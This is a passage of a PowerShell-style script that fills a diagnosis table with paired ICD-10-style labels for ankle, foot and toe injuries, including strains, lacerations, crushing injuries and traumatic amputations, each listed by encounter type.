intrinsic muscle and tendon at ankle and foot level, right foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, right foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, right foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, right foot","Strain of intrinsic muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, right foot","Strain of intrinsic muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, right foot","Strain of intrinsic muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, left foot","Strain of intrinsic muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, left foot","Strain of intrinsic muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, left foot","Strain of intrinsic muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Strain of intrinsic muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, right foot","Laceration of intrinsic muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, right foot","Laceration of intrinsic muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, right foot","Laceration of intrinsic muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, left foot","Laceration of intrinsic muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, left foot","Laceration of intrinsic muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, left foot","Laceration of intrinsic muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Laceration of intrinsic muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of intrinsic muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Unspecified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, right foot","Strain of other specified muscles and tendons at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, right foot","Strain of other specified muscles and tendons at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, right foot","Strain of other specified muscles and tendons at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, left foot","Strain of other specified muscles and tendons at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, left foot","Strain of other specified muscles and tendons at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, left foot","Strain of other specified muscles and tendons at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, unspecified foot","Strain of other specified muscles and tendons at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, unspecified foot","Strain of other specified muscles and tendons at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles and tendons at ankle and foot level, unspecified foot","Strain of other specified muscles and tendons at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, right foot","Laceration of other specified muscles and tendons at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, right foot","Laceration of other specified muscles and tendons at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, right foot","Laceration of other specified muscles and tendons at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, left foot","Laceration of other specified muscles and tendons at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, left foot","Laceration of other specified muscles and tendons at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, left foot","Laceration of other specified muscles and tendons at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot","Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot","Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot","Laceration of other specified muscles and tendons at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, right foot","Other specified injury of other specified muscles and tendons at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, right foot","Other specified injury of other specified muscles and tendons at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, right foot","Other specified injury of other specified muscles and tendons at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, left foot","Other specified injury of other specified muscles and tendons at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, left foot","Other specified injury of other specified muscles and tendons at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, left foot","Other specified injury of other specified muscles and tendons at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot","Other specified injury of other specified muscles and tendons at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Unspecified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, right foot","Strain of unspecified muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, right foot","Strain of unspecified muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, right foot","Strain of unspecified muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, left foot","Strain of unspecified muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, left foot","Strain of unspecified muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, left foot","Strain of unspecified muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot","Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot","Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot","Strain of unspecified muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, right foot","Laceration of unspecified muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, right foot","Laceration of unspecified muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, right foot","Laceration of unspecified muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, left foot","Laceration of unspecified muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, left foot","Laceration of unspecified muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, left foot","Laceration of unspecified muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot","Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot","Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot","Laceration of unspecified muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot","Other specified injury of unspecified muscle and tendon at ankle and foot level, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified ankle","Crushing injury of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified ankle","Crushing injury of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified ankle","Crushing injury of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ankle","Crushing injury of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ankle","Crushing injury of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right ankle","Crushing injury of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ankle","Crushing injury of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ankle","Crushing injury of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left ankle","Crushing injury of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified right toe(s)","Crushing injury of unspecified right toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified right toe(s)","Crushing injury of unspecified right toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified right toe(s)","Crushing injury of unspecified right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified left toe(s)","Crushing injury of unspecified left toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified left toe(s)","Crushing injury of unspecified left toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified left toe(s)","Crushing injury of unspecified left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified toe(s)","Crushing injury of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified toe(s)","Crushing injury of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified toe(s)","Crushing injury of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right great toe","Crushing injury of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right great toe","Crushing injury of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right great toe","Crushing injury of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left great toe","Crushing injury of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left great toe","Crushing injury of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left great toe","Crushing injury of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified great toe","Crushing injury of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified great toe","Crushing injury of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified great toe","Crushing injury of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lesser toe(s)","Crushing injury of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lesser toe(s)","Crushing injury of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right lesser toe(s)","Crushing injury of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lesser toe(s)","Crushing injury of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lesser toe(s)","Crushing injury of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left lesser toe(s)","Crushing injury of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lesser toe(s)","Crushing injury of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lesser toe(s)","Crushing injury of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified lesser toe(s)","Crushing injury of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified foot","Crushing injury of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified foot","Crushing injury of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified foot","Crushing injury of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right foot","Crushing injury of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right foot","Crushing injury of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right foot","Crushing injury of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left foot","Crushing injury of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left foot","Crushing injury of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left foot","Crushing injury of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot at ankle level","Complete traumatic amputation of right foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot at ankle level","Complete traumatic amputation of right foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot at ankle level","Complete traumatic amputation of right foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot at ankle level","Complete traumatic amputation of left foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot at ankle level","Complete traumatic amputation of left foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot at ankle level","Complete traumatic amputation of left foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot at ankle level","Complete traumatic amputation of unspecified foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot at ankle level","Complete traumatic amputation of unspecified foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot at ankle level","Complete traumatic amputation of unspecified foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot at ankle level","Partial traumatic amputation of right foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot at ankle level","Partial traumatic amputation of right foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot at ankle level","Partial traumatic amputation of right foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot at ankle level","Partial traumatic amputation of left foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot at ankle level","Partial traumatic amputation of left foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot at ankle level","Partial traumatic amputation of left foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot at ankle level","Partial traumatic amputation of unspecified foot at ankle level, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot at ankle level","Partial traumatic amputation of unspecified foot at ankle level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot at ankle level","Partial traumatic amputation of unspecified foot at ankle level, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right great toe","Complete traumatic amputation of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right great toe","Complete traumatic amputation of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right great toe","Complete traumatic amputation of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left great toe","Complete traumatic amputation of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left great toe","Complete traumatic amputation of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left great toe","Complete traumatic amputation of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified great toe","Complete traumatic amputation of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified great toe","Complete traumatic amputation of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified great toe","Complete traumatic amputation of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right great toe","Partial traumatic amputation of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right great toe","Partial traumatic amputation of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right great toe","Partial traumatic amputation of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left great toe","Partial traumatic amputation of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left great toe","Partial traumatic amputation of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left great toe","Partial traumatic amputation of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified great toe","Partial traumatic amputation of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified great toe","Partial traumatic amputation of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified great toe","Partial traumatic amputation of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one right lesser toe","Complete traumatic amputation of one right lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one right lesser toe","Complete traumatic amputation of one right lesser toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one right lesser toe","Complete traumatic amputation of one right lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one left lesser toe","Complete traumatic amputation of one left lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one left lesser toe","Complete traumatic amputation of one left lesser toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one left lesser toe","Complete traumatic amputation of one left lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one unspecified lesser toe","Complete traumatic amputation of one unspecified lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one unspecified lesser toe","Complete traumatic amputation of one unspecified lesser toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of one unspecified lesser toe","Complete traumatic amputation of one unspecified lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one right lesser toe","Partial traumatic amputation of one right lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one right lesser toe","Partial traumatic amputation of one right lesser toe, subsequent encounter") + $null = 